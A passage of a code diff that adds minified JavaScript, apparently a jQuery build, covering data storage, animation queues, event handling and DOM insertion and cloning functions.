1626
+ return Q.access(e, t, n);
1627
+ },
1628
+ removeData: function (e, t) {
1629
+ Q.remove(e, t);
1630
+ },
1631
+ _data: function (e, t, n) {
1632
+ return Y.access(e, t, n);
1633
+ },
1634
+ _removeData: function (e, t) {
1635
+ Y.remove(e, t);
1636
+ },
1637
+ }),
1638
+ b.fn.extend({
1639
+ data: function (e, t) {
1640
+ var n,
1641
+ r,
1642
+ i,
1643
+ o = this[0],
1644
+ a = o && o.attributes;
1645
+ if (void 0 === e) {
1646
+ if (this.length && ((i = Q.get(o)), 1 === o.nodeType && !Y.get(o, "hasDataAttrs"))) {
1647
+ for (n = a.length; n--; ) a[n] && 0 === (r = a[n].name).indexOf("data-") && Z(o, (r = U(r.slice(5))), i[r]);
1648
+ Y.set(o, "hasDataAttrs", !0);
1649
+ }
1650
+ return i;
1651
+ }
1652
+ return "object" == typeof e
1653
+ ? this.each(function () {
1654
+ Q.set(this, e);
1655
+ })
1656
+ : R(
1657
+ this,
1658
+ function (t) {
1659
+ var n;
1660
+ if (o && void 0 === t) return void 0 !== (n = Q.get(o, e)) ? n : void 0 !== (n = Z(o, e)) ? n : void 0;
1661
+ this.each(function () {
1662
+ Q.set(this, e, t);
1663
+ });
1664
+ },
1665
+ null,
1666
+ t,
1667
+ arguments.length > 1,
1668
+ null,
1669
+ !0
1670
+ );
1671
+ },
1672
+ removeData: function (e) {
1673
+ return this.each(function () {
1674
+ Q.remove(this, e);
1675
+ });
1676
+ },
1677
+ }),
1678
+ b.extend({
1679
+ queue: function (e, t, n) {
1680
+ var r;
1681
+ if (e) return (t = (t || "fx") + "queue"), (r = Y.get(e, t)), n && (!r || Array.isArray(n) ? (r = Y.access(e, t, b.makeArray(n))) : r.push(n)), r || [];
1682
+ },
1683
+ dequeue: function (e, t) {
1684
+ t = t || "fx";
1685
+ var n = b.queue(e, t),
1686
+ r = n.length,
1687
+ i = n.shift(),
1688
+ o = b._queueHooks(e, t);
1689
+ "inprogress" === i && ((i = n.shift()), r--),
1690
+ i &&
1691
+ ("fx" === t && n.unshift("inprogress"),
1692
+ delete o.stop,
1693
+ i.call(
1694
+ e,
1695
+ function () {
1696
+ b.dequeue(e, t);
1697
+ },
1698
+ o
1699
+ )),
1700
+ !r && o && o.empty.fire();
1701
+ },
1702
+ _queueHooks: function (e, t) {
1703
+ var n = t + "queueHooks";
1704
+ return (
1705
+ Y.get(e, n) ||
1706
+ Y.access(e, n, {
1707
+ empty: b.Callbacks("once memory").add(function () {
1708
+ Y.remove(e, [t + "queue", n]);
1709
+ }),
1710
+ })
1711
+ );
1712
+ },
1713
+ }),
1714
+ b.fn.extend({
1715
+ queue: function (e, t) {
1716
+ var n = 2;
1717
+ return (
1718
+ "string" != typeof e && ((t = e), (e = "fx"), n--),
1719
+ arguments.length < n
1720
+ ? b.queue(this[0], e)
1721
+ : void 0 === t
1722
+ ? this
1723
+ : this.each(function () {
1724
+ var n = b.queue(this, e, t);
1725
+ b._queueHooks(this, e), "fx" === e && "inprogress" !== n[0] && b.dequeue(this, e);
1726
+ })
1727
+ );
1728
+ },
1729
+ dequeue: function (e) {
1730
+ return this.each(function () {
1731
+ b.dequeue(this, e);
1732
+ });
1733
+ },
1734
+ clearQueue: function (e) {
1735
+ return this.queue(e || "fx", []);
1736
+ },
1737
+ promise: function (e, t) {
1738
+ var n,
1739
+ r = 1,
1740
+ i = b.Deferred(),
1741
+ o = this,
1742
+ a = this.length,
1743
+ s = function () {
1744
+ --r || i.resolveWith(o, [o]);
1745
+ };
1746
+ for ("string" != typeof e && ((t = e), (e = void 0)), e = e || "fx"; a--; ) (n = Y.get(o[a], e + "queueHooks")) && n.empty && (r++, n.empty.add(s));
1747
+ return s(), i.promise(t);
1748
+ },
1749
+ });
1750
+ var ee = /[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,
1751
+ et = RegExp("^(?:([+-])=|)(" + ee + ")([a-z%]*)$", "i"),
1752
+ en = ["Top", "Right", "Bottom", "Left"],
1753
+ er = v.documentElement,
1754
+ ei = function (e) {
1755
+ return b.contains(e.ownerDocument, e);
1756
+ },
1757
+ eo = { composed: !0 };
1758
+ er.getRootNode &&
1759
+ (ei = function (e) {
1760
+ return b.contains(e.ownerDocument, e) || e.getRootNode(eo) === e.ownerDocument;
1761
+ });
1762
+ var ea = function (e, t) {
1763
+ return "none" === (e = t || e).style.display || ("" === e.style.display && ei(e) && "none" === b.css(e, "display"));
1764
+ };
1765
+ function es(e, t, n, r) {
1766
+ var i,
1767
+ o,
1768
+ a = 20,
1769
+ s = r
1770
+ ? function () {
1771
+ return r.cur();
1772
+ }
1773
+ : function () {
1774
+ return b.css(e, t, "");
1775
+ },
1776
+ u = s(),
1777
+ l = (n && n[3]) || (b.cssNumber[t] ? "" : "px"),
1778
+ c = e.nodeType && (b.cssNumber[t] || ("px" !== l && +u)) && et.exec(b.css(e, t));
1779
+ if (c && c[3] !== l) {
1780
+ for (u /= 2, l = l || c[3], c = +u || 1; a--; ) b.style(e, t, c + l), (1 - o) * (1 - (o = s() / u || 0.5)) <= 0 && (a = 0), (c /= o);
1781
+ (c *= 2), b.style(e, t, c + l), (n = n || []);
1782
+ }
1783
+ return n && ((c = +c || +u || 0), (i = n[1] ? c + (n[1] + 1) * n[2] : +n[2]), r && ((r.unit = l), (r.start = c), (r.end = i))), i;
1784
+ }
1785
+ var eu = {};
1786
+ function el(e) {
1787
+ var t,
1788
+ n = e.ownerDocument,
1789
+ r = e.nodeName,
1790
+ i = eu[r];
1791
+ return i || ((t = n.body.appendChild(n.createElement(r))), (i = b.css(t, "display")), t.parentNode.removeChild(t), "none" === i && (i = "block"), (eu[r] = i), i);
1792
+ }
1793
+ function ec(e, t) {
1794
+ for (var n, r, i = [], o = 0, a = e.length; o < a; o++)
1795
+ (r = e[o]).style &&
1796
+ ((n = r.style.display),
1797
+ t ? ("none" === n && ((i[o] = Y.get(r, "display") || null), i[o] || (r.style.display = "")), "" === r.style.display && ea(r) && (i[o] = el(r))) : "none" !== n && ((i[o] = "none"), Y.set(r, "display", n)));
1798
+ for (o = 0; o < a; o++) null != i[o] && (e[o].style.display = i[o]);
1799
+ return e;
1800
+ }
1801
+ b.fn.extend({
1802
+ show: function () {
1803
+ return ec(this, !0);
1804
+ },
1805
+ hide: function () {
1806
+ return ec(this);
1807
+ },
1808
+ toggle: function (e) {
1809
+ return "boolean" == typeof e
1810
+ ? e
1811
+ ? this.show()
1812
+ : this.hide()
1813
+ : this.each(function () {
1814
+ ea(this) ? b(this).show() : b(this).hide();
1815
+ });
1816
+ },
1817
+ });
1818
+ var ef,
1819
+ ep,
1820
+ ed = /^(?:checkbox|radio)$/i,
1821
+ eh = /<([a-z][^\/\0>\x20\t\r\n\f]*)/i,
1822
+ eg = /^$|^module$|\/(?:java|ecma)script/i;
1823
+ (ef = v.createDocumentFragment().appendChild(v.createElement("div"))),
1824
+ (ep = v.createElement("input")).setAttribute("type", "radio"),
1825
+ ep.setAttribute("checked", "checked"),
1826
+ ep.setAttribute("name", "t"),
1827
+ ef.appendChild(ep),
1828
+ (d.checkClone = ef.cloneNode(!0).cloneNode(!0).lastChild.checked),
1829
+ (ef.innerHTML = "<textarea>x</textarea>"),
1830
+ (d.noCloneChecked = !!ef.cloneNode(!0).lastChild.defaultValue),
1831
+ (ef.innerHTML = "<option></option>"),
1832
+ (d.option = !!ef.lastChild);
1833
+ var ev = { thead: [1, "<table>", "</table>"], col: [2, "<table><colgroup>", "</colgroup></table>"], tr: [2, "<table><tbody>", "</tbody></table>"], td: [3, "<table><tbody><tr>", "</tr></tbody></table>"], _default: [0, "", ""] };
1834
+ function em(e, t) {
1835
+ var n;
1836
+ return (n = void 0 !== e.getElementsByTagName ? e.getElementsByTagName(t || "*") : void 0 !== e.querySelectorAll ? e.querySelectorAll(t || "*") : []), void 0 === t || (t && S(e, t)) ? b.merge([e], n) : n;
1837
+ }
1838
+ function ey(e, t) {
1839
+ for (var n = 0, r = e.length; n < r; n++) Y.set(e[n], "globalEval", !t || Y.get(t[n], "globalEval"));
1840
+ }
1841
+ (ev.tbody = ev.tfoot = ev.colgroup = ev.caption = ev.thead), (ev.th = ev.td), d.option || (ev.optgroup = ev.option = [1, "<select multiple='multiple'>", "</select>"]);
1842
+ var e$ = /<|&#?\w+;/;
1843
+ function ex(e, t, n, r, i) {
1844
+ for (var o, a, s, u, l, c, f = t.createDocumentFragment(), p = [], d = 0, h = e.length; d < h; d++)
1845
+ if ((o = e[d]) || 0 === o) {
1846
+ if ("object" === x(o)) b.merge(p, o.nodeType ? [o] : o);
1847
+ else if (e$.test(o)) {
1848
+ for (a = a || f.appendChild(t.createElement("div")), u = ev[(s = (eh.exec(o) || ["", ""])[1].toLowerCase())] || ev._default, a.innerHTML = u[1] + b.htmlPrefilter(o) + u[2], c = u[0]; c--; ) a = a.lastChild;
1849
+ b.merge(p, a.childNodes), ((a = f.firstChild).textContent = "");
1850
+ } else p.push(t.createTextNode(o));
1851
+ }
1852
+ for (f.textContent = "", d = 0; (o = p[d++]); )
1853
+ if (r && b.inArray(o, r) > -1) i && i.push(o);
1854
+ else if (((l = ei(o)), (a = em(f.appendChild(o), "script")), l && ey(a), n)) for (c = 0; (o = a[c++]); ) eg.test(o.type || "") && n.push(o);
1855
+ return f;
1856
+ }
1857
+ var eb = /^([^.]*)(?:\.(.+)|)/;
1858
+ function e_() {
1859
+ return !0;
1860
+ }
1861
+ function eT() {
1862
+ return !1;
1863
+ }
1864
+ function ew(e, t) {
1865
+ return (
1866
+ (e ===
1867
+ (function () {
1868
+ try {
1869
+ return v.activeElement;
1870
+ } catch (e) {}
1871
+ })()) ==
1872
+ ("focus" === t)
1873
+ );
1874
+ }
1875
+ function eC(e, t, n, r, i, o) {
1876
+ var a, s;
1877
+ if ("object" == typeof t) {
1878
+ for (s in ("string" != typeof n && ((r = r || n), (n = void 0)), t)) eC(e, s, n, r, t[s], o);
1879
+ return e;
1880
+ }
1881
+ if ((null == r && null == i ? ((i = n), (r = n = void 0)) : null == i && ("string" == typeof n ? ((i = r), (r = void 0)) : ((i = r), (r = n), (n = void 0))), !1 === i)) i = eT;
1882
+ else if (!i) return e;
1883
+ return (
1884
+ 1 === o &&
1885
+ ((a = i),
1886
+ ((i = function (e) {
1887
+ return b().off(e), a.apply(this, arguments);
1888
+ }).guid = a.guid || (a.guid = b.guid++))),
1889
+ e.each(function () {
1890
+ b.event.add(this, t, i, r, n);
1891
+ })
1892
+ );
1893
+ }
1894
+ function ek(e, t, n) {
1895
+ n
1896
+ ? (Y.set(e, t, !1),
1897
+ b.event.add(e, t, {
1898
+ namespace: !1,
1899
+ handler: function (e) {
1900
+ var r,
1901
+ o,
1902
+ a = Y.get(this, t);
1903
+ if (1 & e.isTrigger && this[t]) {
1904
+ if (a.length) (b.event.special[t] || {}).delegateType && e.stopPropagation();
1905
+ else if (((a = i.call(arguments)), Y.set(this, t, a), (r = n(this, t)), this[t](), a !== (o = Y.get(this, t)) || r ? Y.set(this, t, !1) : (o = {}), a !== o))
1906
+ return e.stopImmediatePropagation(), e.preventDefault(), o && o.value;
1907
+ } else a.length && (Y.set(this, t, { value: b.event.trigger(b.extend(a[0], b.Event.prototype), a.slice(1), this) }), e.stopImmediatePropagation());
1908
+ },
1909
+ }))
1910
+ : void 0 === Y.get(e, t) && b.event.add(e, t, e_);
1911
+ }
1912
+ (b.event = {
1913
+ global: {},
1914
+ add: function (e, t, n, r, i) {
1915
+ var o,
1916
+ a,
1917
+ s,
1918
+ u,
1919
+ l,
1920
+ c,
1921
+ f,
1922
+ p,
1923
+ d,
1924
+ h,
1925
+ g,
1926
+ v = Y.get(e);
1927
+ if (V(e))
1928
+ for (
1929
+ n.handler && ((n = (o = n).handler), (i = o.selector)),
1930
+ i && b.find.matchesSelector(er, i),
1931
+ n.guid || (n.guid = b.guid++),
1932
+ (u = v.events) || (u = v.events = Object.create(null)),
1933
+ (a = v.handle) ||
1934
+ (a = v.handle = function (t) {
1935
+ return void 0 !== b && b.event.triggered !== t.type ? b.event.dispatch.apply(e, arguments) : void 0;
1936
+ }),
1937
+ l = (t = (t || "").match(H) || [""]).length;
1938
+ l--;
1939
+
1940
+ )
1941
+ (d = g = (s = eb.exec(t[l]) || [])[1]),
1942
+ (h = (s[2] || "").split(".").sort()),
1943
+ d &&
1944
+ ((f = b.event.special[d] || {}),
1945
+ (d = (i ? f.delegateType : f.bindType) || d),
1946
+ (f = b.event.special[d] || {}),
1947
+ (c = b.extend({ type: d, origType: g, data: r, handler: n, guid: n.guid, selector: i, needsContext: i && b.expr.match.needsContext.test(i), namespace: h.join(".") }, o)),
1948
+ (p = u[d]) || (((p = u[d] = []).delegateCount = 0), (f.setup && !1 !== f.setup.call(e, r, h, a)) || (e.addEventListener && e.addEventListener(d, a))),
1949
+ f.add && (f.add.call(e, c), c.handler.guid || (c.handler.guid = n.guid)),
1950
+ i ? p.splice(p.delegateCount++, 0, c) : p.push(c),
1951
+ (b.event.global[d] = !0));
1952
+ },
1953
+ remove: function (e, t, n, r, i) {
1954
+ var o,
1955
+ a,
1956
+ s,
1957
+ u,
1958
+ l,
1959
+ c,
1960
+ f,
1961
+ p,
1962
+ d,
1963
+ h,
1964
+ g,
1965
+ v = Y.hasData(e) && Y.get(e);
1966
+ if (v && (u = v.events)) {
1967
+ for (l = (t = (t || "").match(H) || [""]).length; l--; )
1968
+ if (((d = g = (s = eb.exec(t[l]) || [])[1]), (h = (s[2] || "").split(".").sort()), d)) {
1969
+ for (f = b.event.special[d] || {}, p = u[(d = (r ? f.delegateType : f.bindType) || d)] || [], s = s[2] && RegExp("(^|\\.)" + h.join("\\.(?:.*\\.|)") + "(\\.|$)"), a = o = p.length; o--; )
1970
+ (c = p[o]),
1971
+ (!i && g !== c.origType) ||
1972
+ (n && n.guid !== c.guid) ||
1973
+ (s && !s.test(c.namespace)) ||
1974
+ (r && r !== c.selector && ("**" !== r || !c.selector)) ||
1975
+ (p.splice(o, 1), c.selector && p.delegateCount--, f.remove && f.remove.call(e, c));
1976
+ a && !p.length && ((f.teardown && !1 !== f.teardown.call(e, h, v.handle)) || b.removeEvent(e, d, v.handle), delete u[d]);
1977
+ } else for (d in u) b.event.remove(e, d + t[l], n, r, !0);
1978
+ b.isEmptyObject(u) && Y.remove(e, "handle events");
1979
+ }
1980
+ },
1981
+ dispatch: function (e) {
1982
+ var t,
1983
+ n,
1984
+ r,
1985
+ i,
1986
+ o,
1987
+ a,
1988
+ s = Array(arguments.length),
1989
+ u = b.event.fix(e),
1990
+ l = (Y.get(this, "events") || Object.create(null))[u.type] || [],
1991
+ c = b.event.special[u.type] || {};
1992
+ for (s[0] = u, t = 1; t < arguments.length; t++) s[t] = arguments[t];
1993
+ if (((u.delegateTarget = this), !c.preDispatch || !1 !== c.preDispatch.call(this, u))) {
1994
+ for (a = b.event.handlers.call(this, u, l), t = 0; (i = a[t++]) && !u.isPropagationStopped(); )
1995
+ for (u.currentTarget = i.elem, n = 0; (o = i.handlers[n++]) && !u.isImmediatePropagationStopped(); )
1996
+ (u.rnamespace && !1 !== o.namespace && !u.rnamespace.test(o.namespace)) ||
1997
+ ((u.handleObj = o), (u.data = o.data), void 0 !== (r = ((b.event.special[o.origType] || {}).handle || o.handler).apply(i.elem, s)) && !1 === (u.result = r) && (u.preventDefault(), u.stopPropagation()));
1998
+ return c.postDispatch && c.postDispatch.call(this, u), u.result;
1999
+ }
2000
+ },
2001
+ handlers: function (e, t) {
2002
+ var n,
2003
+ r,
2004
+ i,
2005
+ o,
2006
+ a,
2007
+ s = [],
2008
+ u = t.delegateCount,
2009
+ l = e.target;
2010
+ if (u && l.nodeType && !("click" === e.type && e.button >= 1)) {
2011
+ for (; l !== this; l = l.parentNode || this)
2012
+ if (1 === l.nodeType && ("click" !== e.type || !0 !== l.disabled)) {
2013
+ for (o = [], a = {}, n = 0; n < u; n++) void 0 === a[(i = (r = t[n]).selector + " ")] && (a[i] = r.needsContext ? b(i, this).index(l) > -1 : b.find(i, this, null, [l]).length), a[i] && o.push(r);
2014
+ o.length && s.push({ elem: l, handlers: o });
2015
+ }
2016
+ }
2017
+ return (l = this), u < t.length && s.push({ elem: l, handlers: t.slice(u) }), s;
2018
+ },
2019
+ addProp: function (e, t) {
2020
+ Object.defineProperty(b.Event.prototype, e, {
2021
+ enumerable: !0,
2022
+ configurable: !0,
2023
+ get: h(t)
2024
+ ? function () {
2025
+ if (this.originalEvent) return t(this.originalEvent);
2026
+ }
2027
+ : function () {
2028
+ if (this.originalEvent) return this.originalEvent[e];
2029
+ },
2030
+ set: function (t) {
2031
+ Object.defineProperty(this, e, { enumerable: !0, configurable: !0, writable: !0, value: t });
2032
+ },
2033
+ });
2034
+ },
2035
+ fix: function (e) {
2036
+ return e[b.expando] ? e : new b.Event(e);
2037
+ },
2038
+ special: {
2039
+ load: { noBubble: !0 },
2040
+ click: {
2041
+ setup: function (e) {
2042
+ var t = this || e;
2043
+ return ed.test(t.type) && t.click && S(t, "input") && ek(t, "click", e_), !1;
2044
+ },
2045
+ trigger: function (e) {
2046
+ var t = this || e;
2047
+ return ed.test(t.type) && t.click && S(t, "input") && ek(t, "click"), !0;
2048
+ },
2049
+ _default: function (e) {
2050
+ var t = e.target;
2051
+ return (ed.test(t.type) && t.click && S(t, "input") && Y.get(t, "click")) || S(t, "a");
2052
+ },
2053
+ },
2054
+ beforeunload: {
2055
+ postDispatch: function (e) {
2056
+ void 0 !== e.result && e.originalEvent && (e.originalEvent.returnValue = e.result);
2057
+ },
2058
+ },
2059
+ },
2060
+ }),
2061
+ (b.removeEvent = function (e, t, n) {
2062
+ e.removeEventListener && e.removeEventListener(t, n);
2063
+ }),
2064
+ (b.Event = function (e, t) {
2065
+ if (!(this instanceof b.Event)) return new b.Event(e, t);
2066
+ e && e.type
2067
+ ? ((this.originalEvent = e),
2068
+ (this.type = e.type),
2069
+ (this.isDefaultPrevented = e.defaultPrevented || (void 0 === e.defaultPrevented && !1 === e.returnValue) ? e_ : eT),
2070
+ (this.target = e.target && 3 === e.target.nodeType ? e.target.parentNode : e.target),
2071
+ (this.currentTarget = e.currentTarget),
2072
+ (this.relatedTarget = e.relatedTarget))
2073
+ : (this.type = e),
2074
+ t && b.extend(this, t),
2075
+ (this.timeStamp = (e && e.timeStamp) || Date.now()),
2076
+ (this[b.expando] = !0);
2077
+ }),
2078
+ (b.Event.prototype = {
2079
+ constructor: b.Event,
2080
+ isDefaultPrevented: eT,
2081
+ isPropagationStopped: eT,
2082
+ isImmediatePropagationStopped: eT,
2083
+ isSimulated: !1,
2084
+ preventDefault: function () {
2085
+ var e = this.originalEvent;
2086
+ (this.isDefaultPrevented = e_), e && !this.isSimulated && e.preventDefault();
2087
+ },
2088
+ stopPropagation: function () {
2089
+ var e = this.originalEvent;
2090
+ (this.isPropagationStopped = e_), e && !this.isSimulated && e.stopPropagation();
2091
+ },
2092
+ stopImmediatePropagation: function () {
2093
+ var e = this.originalEvent;
2094
+ (this.isImmediatePropagationStopped = e_), e && !this.isSimulated && e.stopImmediatePropagation(), this.stopPropagation();
2095
+ },
2096
+ }),
2097
+ b.each(
2098
+ {
2099
+ altKey: !0,
2100
+ bubbles: !0,
2101
+ cancelable: !0,
2102
+ changedTouches: !0,
2103
+ ctrlKey: !0,
2104
+ detail: !0,
2105
+ eventPhase: !0,
2106
+ metaKey: !0,
2107
+ pageX: !0,
2108
+ pageY: !0,
2109
+ shiftKey: !0,
2110
+ view: !0,
2111
+ char: !0,
2112
+ code: !0,
2113
+ charCode: !0,
2114
+ key: !0,
2115
+ keyCode: !0,
2116
+ button: !0,
2117
+ buttons: !0,
2118
+ clientX: !0,
2119
+ clientY: !0,
2120
+ offsetX: !0,
2121
+ offsetY: !0,
2122
+ pointerId: !0,
2123
+ pointerType: !0,
2124
+ screenX: !0,
2125
+ screenY: !0,
2126
+ targetTouches: !0,
2127
+ toElement: !0,
2128
+ touches: !0,
2129
+ which: !0,
2130
+ },
2131
+ b.event.addProp
2132
+ ),
2133
+ b.each({ focus: "focusin", blur: "focusout" }, function (e, t) {
2134
+ b.event.special[e] = {
2135
+ setup: function () {
2136
+ return ek(this, e, ew), !1;
2137
+ },
2138
+ trigger: function () {
2139
+ return ek(this, e), !0;
2140
+ },
2141
+ _default: function () {
2142
+ return !0;
2143
+ },
2144
+ delegateType: t,
2145
+ };
2146
+ }),
2147
+ b.each({ mouseenter: "mouseover", mouseleave: "mouseout", pointerenter: "pointerover", pointerleave: "pointerout" }, function (e, t) {
2148
+ b.event.special[e] = {
2149
+ delegateType: t,
2150
+ bindType: t,
2151
+ handle: function (e) {
2152
+ var n,
2153
+ r = e.relatedTarget,
2154
+ i = e.handleObj;
2155
+ return (r && (r === this || b.contains(this, r))) || ((e.type = i.origType), (n = i.handler.apply(this, arguments)), (e.type = t)), n;
2156
+ },
2157
+ };
2158
+ }),
2159
+ b.fn.extend({
2160
+ on: function (e, t, n, r) {
2161
+ return eC(this, e, t, n, r);
2162
+ },
2163
+ one: function (e, t, n, r) {
2164
+ return eC(this, e, t, n, r, 1);
2165
+ },
2166
+ off: function (e, t, n) {
2167
+ var r, i;
2168
+ if (e && e.preventDefault && e.handleObj) return (r = e.handleObj), b(e.delegateTarget).off(r.namespace ? r.origType + "." + r.namespace : r.origType, r.selector, r.handler), this;
2169
+ if ("object" == typeof e) {
2170
+ for (i in e) this.off(i, t, e[i]);
2171
+ return this;
2172
+ }
2173
+ return (
2174
+ (!1 !== t && "function" != typeof t) || ((n = t), (t = void 0)),
2175
+ !1 === n && (n = eT),
2176
+ this.each(function () {
2177
+ b.event.remove(this, e, n, t);
2178
+ })
2179
+ );
2180
+ },
2181
+ });
2182
+ var eS = /<script|<style|<link/i,
2183
+ eE = /checked\s*(?:[^=]|=\s*.checked.)/i,
2184
+ eN = /^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g;
2185
+ function eA(e, t) {
2186
+ return (S(e, "table") && S(11 !== t.nodeType ? t : t.firstChild, "tr") && b(e).children("tbody")[0]) || e;
2187
+ }
2188
+ function eD(e) {
2189
+ return (e.type = (null !== e.getAttribute("type")) + "/" + e.type), e;
2190
+ }
2191
+ function ej(e) {
2192
+ return "true/" === (e.type || "").slice(0, 5) ? (e.type = e.type.slice(5)) : e.removeAttribute("type"), e;
2193
+ }
2194
+ function eq(e, t) {
2195
+ var n, r, i, o, a, s;
2196
+ if (1 === t.nodeType) {
2197
+ if (Y.hasData(e) && (s = Y.get(e).events)) for (i in (Y.remove(t, "handle events"), s)) for (n = 0, r = s[i].length; n < r; n++) b.event.add(t, i, s[i][n]);
2198
+ Q.hasData(e) && ((o = Q.access(e)), (a = b.extend({}, o)), Q.set(t, a));
2199
+ }
2200
+ }
2201
+ function eL(e, t, n, r) {
2202
+ t = o(t);
2203
+ var i,
2204
+ a,
2205
+ s,
2206
+ u,
2207
+ l,
2208
+ c,
2209
+ f = 0,
2210
+ p = e.length,
2211
+ g = p - 1,
2212
+ v = t[0],
2213
+ m = h(v);
2214
+ if (m || (p > 1 && "string" == typeof v && !d.checkClone && eE.test(v)))
2215
+ return e.each(function (i) {
2216
+ var o = e.eq(i);
2217
+ m && (t[0] = v.call(this, i, o.html())), eL(o, t, n, r);
2218
+ });
2219
+ if (p && ((a = (i = ex(t, e[0].ownerDocument, !1, e, r)).firstChild), 1 === i.childNodes.length && (i = a), a || r)) {
2220
+ for (u = (s = b.map(em(i, "script"), eD)).length; f < p; f++) (l = i), f !== g && ((l = b.clone(l, !0, !0)), u && b.merge(s, em(l, "script"))), n.call(e[f], l, f);
2221
+ if (u)
2222
+ for (c = s[s.length - 1].ownerDocument, b.map(s, ej), f = 0; f < u; f++)
2223
+ (l = s[f]),
2224
+ eg.test(l.type || "") &&
2225
+ !Y.access(l, "globalEval") &&
2226
+ b.contains(c, l) &&
2227
+ (l.src && "module" !== (l.type || "").toLowerCase() ? b._evalUrl && !l.noModule && b._evalUrl(l.src, { nonce: l.nonce || l.getAttribute("nonce") }, c) : y(l.textContent.replace(eN, ""), l, c));
2228
+ }
2229
+ return e;
2230
+ }
2231
+ function eH(e, t, n) {
2232
+ for (var r, i = t ? b.filter(t, e) : e, o = 0; null != (r = i[o]); o++) n || 1 !== r.nodeType || b.cleanData(em(r)), r.parentNode && (n && ei(r) && ey(em(r, "script")), r.parentNode.removeChild(r));
2233
+ return e;
2234
+ }
2235
+ b.extend({
2236
+ htmlPrefilter: function (e) {
2237
+ return e;
2238
+ },
2239
+ clone: function (e, t, n) {
2240
+ var r,
2241
+ i,
2242
+ o,
2243
+ a,
2244
+ s,
2245
+ u,
2246
+ l,
2247
+ c = e.cloneNode(!0),
2248
+ f = ei(e);
2249
+ if (!(d.noCloneChecked || (1 !== e.nodeType && 11 !== e.nodeType) || b.isXMLDoc(e)))
2250
+ for (a = em(c), r = 0, i = (o = em(e)).length; r < i; r++)
2251
+ (s = o[r]), (u = a[r]), (l = void 0), "input" === (l = u.nodeName.toLowerCase()) && ed.test(s.type) ? (u.checked = s.checked) : ("input" !== l && "textarea" !== l) || (u.defaultValue = s.defaultValue);
2252
+ if (t) {
2253
+ if (n) for (o = o || em(e), a = a || em(c), r = 0, i = o.length; r < i; r++) eq(o[r], a[r]);
2254
+ else eq(e, c);
2255
+ }
2256
+ return (a = em(c, "script")).length > 0 && ey(a, !f && em(e, "script")), c;
2257
+ },
2258
+ cleanData: function (e) {
2259
+ for (var t, n, r, i = b.event.special, o = 0; void 0 !== (n = e[o]); o++)
2260
+ if (V(n)) {
2261
+ if ((t = n[Y.expando])) {
2262
+ if (t.events) for (r in t.events) i[r] ? b.event.remove(n, r) : b.removeEvent(n, r, t.handle);
2263
+ n[Y.expando] = void 0;
2264
+ }
2265
+ n[Q.expando] && (n[Q.expando] = void 0);
2266
+ }
2267
+ },
2268
+ }),
2269
+ b.fn.extend({
2270
+ detach: function (e) {
2271
+ return eH(this, e, !0);
2272
+ },
2273
+ remove: function (e) {
2274
+ return eH(this, e);
2275
+ },
2276
+ text: function (e) {
2277
+ return R(
2278
+ this,
2279
+ function (e) {
2280
+ return void 0 === e
2281
+ ? b.text(this)
2282
+ : this.empty().each(function () {
2283
+ (1 !== this.nodeType && 11 !== this.nodeType && 9 !== this.nodeType) || (this.textContent = e);
2284
+ });
2285
+ },
2286
+ null,
2287
+ e,
2288
+ arguments.length
2289
+ );
2290
+ },
2291
+ append: function () {
2292
+ return eL(this, arguments, function (e) {
2293
+ (1 !== this.nodeType && 11 !== this.nodeType && 9 !== this.nodeType) || eA(this, e).appendChild(e);
2294
+ });
2295
+ },
2296
+ prepend: function () {
2297
+ return eL(this, arguments, function (e) {
2298
+ if (1 === this.nodeType || 11 === this.nodeType || 9 === this.nodeType) {
2299
+ var t = eA(this, e);
2300
+ t.insertBefore(e, t.firstChild);
2301
+ }
2302
+ });
2303
+ },
2304
+ before: function () {
2305
+ return eL(this, arguments, function (e) {
2306
+ this.parentNode && this.parentNode.insertBefore(e, this);
2307
+ });
2308
+ },
2309
+ after: function () {
2310
+ return eL(this, arguments, function (e) {
2311
+ this.parentNode && this.parentNode.insertBefore(e, this.nextSibling);
2312
+ });
2313
+ },
2314
+ empty: function () {
2315
+ for (var e, t = 0; null != (e = this[t]); t++) 1 === e.nodeType && (b.cleanData(em(e, !1)), (e.textContent = ""));
2316
+ return this;
2317
+ },
2318
+ clone: function (e, t) {
2319
+ return (
2320
+ (e = null != e && e),
2321
+ (t = null == t ? e : t),
2322
+ this.map(function () {
2323
+ return b.clone(this, e, t);
2324
+ })
2325
+ );
2326
+ },
2327
+ html: function (e) {
2328
+ return R(
2329
+ this,
2330
+ function (e) {
2331
+ var t = this[0] || {},
2332
+ n = 0,
2333
+ r = this.length;
2334
+ if (void 0 === e && 1 === t.nodeType) return t.innerHTML;
2335
+ if ("string" == typeof e && !eS.test(e) && !ev[(eh.exec(e) || ["", ""])[1].toLowerCase()]) {
2336
+ e = b.htmlPrefilter(e);
2337
+ try {
2338
+ for (; n < r; n++) 1 === (t = this[n] || {}).nodeType && (b.cleanData(em(t, !1)), (t.innerHTML = e));
2339
+ t = 0;
2340
+ } catch (i) {}
2341
+ }
2342
+ t && this.empty().append(e);
2343
+ },
2344
+ null,
2345
+ e,
2346
+ arguments.length
2347
+ );
2348
+ },
2349
+ replaceWith: function () {
2350
+ var e = [];
2351
+ return eL(
2352
+ this,
2353
+ arguments,
2354
+ function (t) {
2355
+ var n = this.parentNode;
2356
+ 0 > b.inArray(this, e) && (b.cleanData(em(this)), n && n.replaceChild(t, this));
2357
+ },
2358
+ e
2359
+ );
2360
+ },
2361
+ }),
2362
+ b.each({ appendTo: "append", prependTo: "prepend", insertBefore: "before", insertAfter: "after", replaceAll: "replaceWith" }, function (e, t) {
2363
+ b.fn[e] = function (e) {
2364
+ for (var n, r = [], i = b(e), o = i.length - 1, s = 0; s <= o; s++) (n = s === o ? this : this.clone(!0)), b(i[s])[t](n), a.apply(r, n.get());
2365
+ return this.pushStack(r);
2366
+ };
2367
+ });
2368
+ var eP = RegExp("^(" + ee + ")(?!px)[a-z%]+$", "i"),
2369
+ eO = function (t) {
2370
+ var n = t.ownerDocument.defaultView;
2371
+ return (n && n.opener) || (n = e), n.getComputedStyle(t);
2372
+ },
2373
+ e0 = function (e, t, n) {
2374
+ var r,
2375
+ i,
2376
+ o = {};
2377
+ for (i in t) (o[i] = e.style[i]), (e.style[i] = t[i]);
2378
+ for (i in ((r = n.call(e)), t)) e.style[i] = o[i];
2379
+ return r;
2380
+ },
2381
+ eI = RegExp(en.join("|"), "i");
2382
+ function eM(e, t, n) {
2383
+ var r,
2384
+ i,
2385
+ o,
2386
+ a,
2387
